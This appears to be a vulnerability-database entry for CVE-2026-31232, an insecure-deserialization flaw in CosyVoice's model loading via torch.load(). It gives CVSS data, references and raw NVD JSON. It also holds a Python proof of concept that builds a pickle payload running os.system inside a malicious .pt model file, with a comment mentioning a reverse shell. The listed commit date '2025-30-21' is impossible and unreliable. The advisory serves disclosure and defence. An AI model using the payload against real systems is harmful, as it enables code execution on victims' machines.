CVE-2026-31232

Description

The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CosyVoice commit <= 6e01309e01bc93bbeb83bdd996b1182a81aaf11e

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import torch
import os
import pickle

# Define a class that executes a command when unpickled
class Exploit:
    def __reduce__(self):
        # The command to execute (e.g., creating a file or reverse shell)
        return (os.system, ('touch /tmp/pwned',))

# Create an instance of the exploit class
malicious_payload = Exploit()

# Save the payload as a .pt file using torch.save
# This simulates a malicious CosyVoice model file
print("[*] Generating malicious model file...")
with open('malicious_model.pt', 'wb') as f:
    torch.save(malicious_payload, f)

print("[+] Malicious model file 'malicious_model.pt' created successfully.")
print("[+] When CosyVoice loads this file via --model_dir, the command will execute.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31232
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31232
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31232/
[4] VulDB https://vuldb.com/cve/CVE-2026-31232
[5] https://github.com/FunAudioLLM/CosyVoice
[6] https://www.notion.so/CVE-2026-31232-35d1e1393188817f869cdcfce13402a8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31232", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.507", "lastModified": "2026-05-14T20:17:02.427", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/FunAudioLLM/CosyVoice", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31232-35d1e1393188817f869cdcfce13402a8", "source": "[email protected]"}]}}